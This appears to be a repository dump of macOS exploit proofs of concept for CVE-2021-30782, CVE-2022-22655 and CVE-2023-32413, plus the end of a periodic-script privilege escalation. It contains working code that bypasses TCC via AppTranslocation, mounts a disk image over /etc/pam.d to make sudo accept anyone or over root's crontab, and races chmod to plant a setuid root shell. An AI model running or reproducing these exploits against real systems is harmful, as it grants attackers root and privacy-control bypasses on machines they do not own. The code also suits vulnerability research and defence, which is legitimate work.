"value"); 53 | 54 | xpc_connection_send_message(conn, msg); 55 | usleep(1000000); 56 | 57 | NSString* script = @"touch /Library/privesc.txt\n"; 58 | NSError *error; 59 | BOOL succeed = [script writeToFile:@"/usr/local/etc/periodic/daily/111.lpe" atomically:YES encoding:NSUTF8StringEncoding error:&error]; 60 | if (!succeed){ 61 | printf("Couldn't create periodic script :(\n"); 62 | } 63 | 64 | char mode[] = "0777"; 65 | int i; 66 | i = strtol(mode, 0, 8); 67 | chmod("/usr/local/etc/periodic/daily/111.lpe",i); 68 | } 69 | -------------------------------------------------------------------------------- /cve-2021-30782_tcc_apptranslocation/xpctrans.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(int argc, const char **argv) { 6 | 7 | 8 | //getenv 9 | char *homedir = getenv("HOME"); 10 | char *tmpdir = getenv("TMPDIR"); 11 | 12 | //create paths 13 | char original[MAXPATHLEN]; 14 | char destination[MAXPATHLEN]; 15 | snprintf(original, sizeof(original), "%s%s", homedir, "/Library"); 16 | snprintf(destination, sizeof(destination), "%s%s%s", "/private", tmpdir, "AppTranslocation/d/d/Library"); 17 | 18 | //add quarantine attribute to Library so translocation can occur 19 | char command[MAXPATHLEN]; 20 | snprintf(command, sizeof(command), "%s%s", "xattr -w com.apple.quarantine \"0083;603abfc5;Safari;FB909FBD-7F1E-4AA1-8D93-CB706A20135C\" ", original); 21 | system(command); 22 | 23 | char command2[MAXPATHLEN]; 24 | snprintf(command2, sizeof(command2), "%s%s%s", "mkdir ", tmpdir, "/AppTranslocation"); 25 | system(command2); 26 | 27 | 28 | 29 | /* from here is just calling the translocation XPC service */ 30 | 31 | uint64_t flags = 0; 32 | char* outPath; 33 | 34 | /* XPC Function keys */ 35 | const char* kSecTranslocateXPCFuncCreate = "create"; 36 | const char* kSecTranslocateXPCFuncCheckIn = "check-in"; 37 | 38 | /* XPC message argument keys */ 39 | const char* 
kSecTranslocateXPCMessageFunction = "function"; 40 | const char* kSecTranslocateXPCMessageOriginalPath = "original"; 41 | const char* kSecTranslocateXPCMessageDestinationPath = "dest"; 42 | const char* kSecTranslocateXPCMessageOptions= "opts"; 43 | const char* kSecTranslocateXPCMessagePid = "pid"; 44 | 45 | /*XPC message reply keys */ 46 | const char* kSecTranslocateXPCReplyError = "error"; 47 | const char* kSecTranslocateXPCReplySecurePath = "result"; 48 | 49 | xpc_connection_t service; 50 | xpc_object_t msg; 51 | 52 | msg = xpc_dictionary_create(NULL, NULL, 0); 53 | 54 | xpc_dictionary_set_string(msg, kSecTranslocateXPCMessageFunction, kSecTranslocateXPCFuncCreate); 55 | xpc_dictionary_set_string(msg, kSecTranslocateXPCMessageOriginalPath, original); 56 | xpc_dictionary_set_int64(msg, kSecTranslocateXPCMessageOptions, flags); 57 | xpc_dictionary_set_string(msg, kSecTranslocateXPCMessageDestinationPath, destination); 58 | 59 | 60 | service = xpc_connection_create_mach_service("com.apple.security.translocation", NULL, 0); 61 | if (service == NULL) { 62 | perror("xpc_connection_create_mach_service"); 63 | } 64 | 65 | xpc_connection_set_event_handler(service, ^(xpc_object_t event) { 66 | xpc_type_t type = xpc_get_type(event); 67 | if (type == XPC_TYPE_ERROR) 68 | { 69 | printf("SecTranslocate, client, xpc error: %s", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION)); 70 | } 71 | else 72 | { 73 | char* description = xpc_copy_description(event); 74 | printf("SecTranslocate, client, xpc unexpected type: %s", description); 75 | 76 | } 77 | }); 78 | 79 | 80 | xpc_connection_resume(service); 81 | 82 | xpc_object_t reply = xpc_connection_send_message_with_reply_sync(service, msg); 83 | xpc_release(msg); 84 | 85 | if(reply == NULL) 86 | { 87 | printf("SecTranslocate, TranslocatorClient, create, no reply returned"); 88 | return -1; 89 | } 90 | 91 | xpc_type_t type = xpc_get_type(reply); 92 | if (type == XPC_TYPE_DICTIONARY) 93 | { 94 | uint64_t error = 0; 95 | 
error = xpc_dictionary_get_int64(reply, kSecTranslocateXPCReplyError); 96 | if(error != 0 ) 97 | { 98 | printf("SecTranslocate, TranslocatorClient, create, error received %lld", error); 99 | xpc_release(reply); 100 | return -1; 101 | } 102 | const char * result = xpc_dictionary_get_string(reply, kSecTranslocateXPCReplySecurePath); 103 | if (result == NULL) 104 | { 105 | printf("SecTranslocate, TranslocatorClient, create, no result path received"); 106 | xpc_release(reply); 107 | return -1; 108 | } 109 | outPath=result; 110 | xpc_release(reply); 111 | } 112 | else 113 | { 114 | const char* errorMsg = NULL; 115 | if (type == XPC_TYPE_ERROR) 116 | { 117 | errorMsg = "SecTranslocate, TranslocatorClient, create, xpc error returned: %s"; 118 | } 119 | else 120 | { 121 | errorMsg = "SecTranslocate, TranslocatorClient, create, unexpected type of return object: %s"; 122 | } 123 | const char *s = xpc_copy_description(reply); 124 | printf(errorMsg, s); 125 | free((char*)s); 126 | xpc_release(reply); 127 | return -1; 128 | } 129 | 130 | printf("%s\n",outPath); 131 | 132 | 133 | } 134 | -------------------------------------------------------------------------------- /cve-2021-30782_tcc_apptranslocation/xpctrans.mov: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/theevilbit/exploits/2f5293f84c20b5813f9b253c883b5fc6e6989a5b/cve-2021-30782_tcc_apptranslocation/xpctrans.mov -------------------------------------------------------------------------------- /cve-2022-22655_macos_tcc_adminconfig_bypass/bypass-config.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | # Make sure only root can run our script 4 | if [ "$(id -u)" != "0" ]; then 5 | echo "[-] Error: This script must be run as root" 6 | exit 1 7 | fi 8 | 9 | echo "[i] create a disk image" 10 | hdiutil create /tmp/tmp.dmg -size 2m -volname "bypass" -fs APFS 11 | hdiutil attach /tmp/tmp.dmg 12 | 13 | echo 
"[i] copy pam config files to our disk image" 14 | cp /etc/pam.d/* /Volumes/bypass 15 | 16 | echo "[i] add write permission to the files we want to edit" 17 | chmod +w /Volumes/bypass/sudo 18 | 19 | echo "[i] add rule to sudo" 20 | echo -e "auth sufficient pam_permit.so\n$(cat /Volumes/bypass/sudo)" > /Volumes/bypass/sudo 21 | 22 | echo "[i] unmount" 23 | hdiutil detach /Volumes/bypass 24 | 25 | echo "[i] mount over pam.d" 26 | hdiutil attach -mountpoint /etc/pam.d -owners on /tmp/tmp.dmg -------------------------------------------------------------------------------- /cve-2022-22655_macos_tcc_adminconfig_bypass/poc-admintcc-bypass.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | #set -x 3 | 4 | #Make sure arguments are supplied 5 | if [ $# -eq 0 ] 6 | then 7 | echo "Error: No arguments supplied\n\t0 - mount over crontabs\n\t1 - mount over pam.d\n" 8 | exit 1 9 | fi 10 | 11 | if [ $1 -ne 0 -a $1 -ne 1 ] 12 | then 13 | echo "Error: argument must be 0 or 1\n\t0 - mount over crontabs\n\t1 - mount over pam.d\n" 14 | exit 1 15 | fi 16 | 17 | # Make sure only root can run our script 18 | if [ "$(id -u)" != "0" ]; then 19 | echo "Error: This script must be run as root" 20 | exit 1 21 | fi 22 | 23 | #cleanup 24 | rm /tmp/tmp.dmg 25 | 26 | #create a disk image 27 | hdiutil create /tmp/tmp.dmg -size 2m -ov -volname "bypass" -fs APFS 28 | hdiutil attach /tmp/tmp.dmg 29 | 30 | #copy pam config files to our disk image 31 | cp /etc/pam.d/* /Volumes/bypass 32 | 33 | #add write permission to the files we want to edit 34 | chmod +w /Volumes/bypass/sshd 35 | chmod +w /Volumes/bypass/sudo 36 | 37 | #add rule to sudo 38 | echo -e "auth sufficient pam_permit.so\n$(cat /Volumes/bypass/sudo)" > /Volumes/bypass/sudo 39 | 40 | #add crontab file to disk image 41 | CMD="touch /private/tmp/crontab_tcc_bypassed.txt" 42 | echo "* * * * *" "$CMD" > /Volumes/bypass/root 43 | sudo chown root:wheel /Volumes/bypass/root 44 | sudo chown 700 
/Volumes/bypass/root 45 | 46 | #unmount 47 | hdiutil detach /Volumes/bypass 48 | 49 | 50 | if [ $1 -eq 1 ] 51 | then 52 | #mount over pam.d 53 | hdiutil attach -mountpoint /etc/pam.d -owners on /tmp/tmp.dmg 54 | fi 55 | 56 | if [ $1 -eq 0 ] 57 | then 58 | #or mount over crontabs 59 | hdiutil attach -mountpoint /private/var/at/tabs -owners on /tmp/tmp.dmg 60 | 61 | #change ownership from _unknown:_unknown to root:wheel 62 | chflags -R nouappnd /private/var/at/tabs 63 | chflags -R nouappnd /private/var/at/tabs/* 64 | chown root:wheel /private/var/at/tabs/* 65 | fi -------------------------------------------------------------------------------- /cve-2023-32413-chmodfd/chmodfd.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | CVE-2023-32413 4 | Originally found by Eloi Benoist-Vanderbeken (@elvanderb) 5 | Presented at: 6 | HEXACON2023 - Eloi BenoistVanderbeken - Finding and exploiting an old XNU logic bug 7 | https://www.youtube.com/watch?v=J2QR58JAO7Q&ab_channel=Hexacon 8 | 9 | */ 10 | 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | 19 | #define SOURCE "/tmp/bin.c" 20 | #define FAKEFILE "/tmp/myfile" 21 | #define BINFILE "/tmp/bin" 22 | #define SUIDFILE "/private/var/log/weekly.out" 23 | 24 | void log_message(const char *message) { 25 | printf("%s\n", message); // Log messages to stdout 26 | } 27 | 28 | // Thread function to open/close FAKEFILE and BINFILE alternately 29 | void *open_close_loop(void *arg) { 30 | while (1) { 31 | int fd; 32 | 33 | // Open FAKEFILE and then close it 34 | fd = open(FAKEFILE, O_RDONLY); 35 | if (fd == -1) { 36 | perror("Failed to open FAKEFILE"); 37 | } else { 38 | usleep(100); 39 | close(fd); 40 | } 41 | 42 | // Open SUIDFILE and then close it 43 | fd = open(SUIDFILE, O_RDONLY); 44 | if (fd == -1) { 45 | perror("Failed to open BINFILE"); 46 | } else { 47 | usleep(100); 48 | close(fd); 49 | } 50 | } 51 | return NULL; 52 | } 53 | 54 | 
/*
 * Return 1 when SUIDFILE's mode is exactly rwsrwxrwx (rwx for user, group
 * and other plus the setuid bit), 0 otherwise.  Only those four bit groups
 * are compared; other mode bits are masked out first.
 *
 * NOTE(review): a failed stat() is only reported with perror() and does not
 * return; fileStat is then read uninitialized, so the result in that case
 * is undefined rather than 0.
 */
int is_correct_chmod() {
    struct stat fileStat;

    // Get the file status
    if (stat(SUIDFILE, &fileStat) < 0) {
        perror("stat");
    }

    // Extract the file permissions (mode)
    mode_t perm = fileStat.st_mode & (S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID);

    // Check if the permissions are rwsrwxrwx
    if (perm == (S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID)) {
        return 1;
    } else {
        return 0;
    }
}

/*
 * Busy-loop calling chmod() on "/dev/fd/3" until is_correct_chmod() reports
 * the rwsrwxrwx mode on SUIDFILE.
 *
 * "/dev/fd/3" names a descriptor number, not SUIDFILE's path.  The PoC
 * presumably relies on descriptor 3 being the one the open_close_loop
 * thread (defined above this span) keeps reopening as it alternates between
 * FAKEFILE and SUIDFILE, so each chmod races that open; the loop simply
 * retries until the mode change has landed on SUIDFILE.  The chmod() result
 * in `ret` is never examined, so errors are retried like any other miss.
 */
void attempt_chmod() {

    while (1) {
        int ret = chmod("/dev/fd/3", S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID);
        if(is_correct_chmod()) {
            log_message("[+] chmod successful");
            break;
        }
    }
}


/*
 * Entry point.  Steps, in order: create FAKEFILE; write a small C program to
 * SOURCE and build it to BINFILE with gcc via system(); start the
 * open/close thread; wait for the first chmod race to succeed; overwrite
 * SUIDFILE with BINFILE's contents (again via system()); wait for the race a
 * second time; run SUIDFILE.  Returns 1 if either fopen() fails; otherwise
 * exit(0) is reached and the pthread_join after it never executes.
 *
 * NOTE(review): the "#include \n" lines below carry no header name in this
 * rendering; the angle-bracketed names look to have been stripped, and as
 * shown the generated source would not compile.  SUIDFILE is presumably a
 * file owned by root, since the generated program expects setuid(0) to
 * succeed -- confirm on the target version.  All paths are fixed names under
 * /tmp, and both system() commands are built from those compile-time strings.
 * For detection, the durable artifacts are the setuid bit appearing on
 * SUIDFILE and its contents being replaced by a freshly compiled binary.
 */
int main() {
    pthread_t thread_id;
    FILE *file;

    file = fopen(FAKEFILE, "w");
    if (file == NULL) {
        perror("Failed to create file");
        return 1;
    }
    fclose(file);

    file = fopen(SOURCE, "w");
    if (file == NULL) {
        perror("Failed to create file");
        return 1;
    }

    // Write the contents into the file
    fprintf(file, "#include \n");
    fprintf(file, "#include \n");
    fprintf(file, "#include \n");
    fprintf(file, "#include \n\n");
    fprintf(file, "int main(int argc, const char **argv)\n");
    fprintf(file, "{\n");
    fprintf(file, " setuid(0);\n");
    fprintf(file, " seteuid(0);\n");
    fprintf(file, " system(\"/bin/bash\");\n");
    fprintf(file, "}\n");

    // Close the file after writing
    fclose(file);

    // Compile the generated C program using gcc
    char command[256];
    snprintf(command, sizeof(command), "gcc %s -o %s", SOURCE, BINFILE);

    // Execute the compilation command (exit status not checked)
    system(command);

    if (pthread_create(&thread_id, NULL, open_close_loop, NULL) != 0) {
        perror("Failed to create thread");
        exit(EXIT_FAILURE);
    }

    // First race: get the setuid mode onto SUIDFILE while it is still the original file
    attempt_chmod();

    char command2[256];
    snprintf(command2, sizeof(command2), "cat %s > %s", BINFILE, SUIDFILE);

    // Replace SUIDFILE's contents in place (cat redirection keeps the inode)
    system(command2);

    // Second race: re-apply the mode after the rewrite
    attempt_chmod();

    log_message("[+] getting root");

    system(SUIDFILE);
    exit(0);
    // Wait for the thread to finish (it won't in this case)
    pthread_join(thread_id, NULL);

    return 0;
}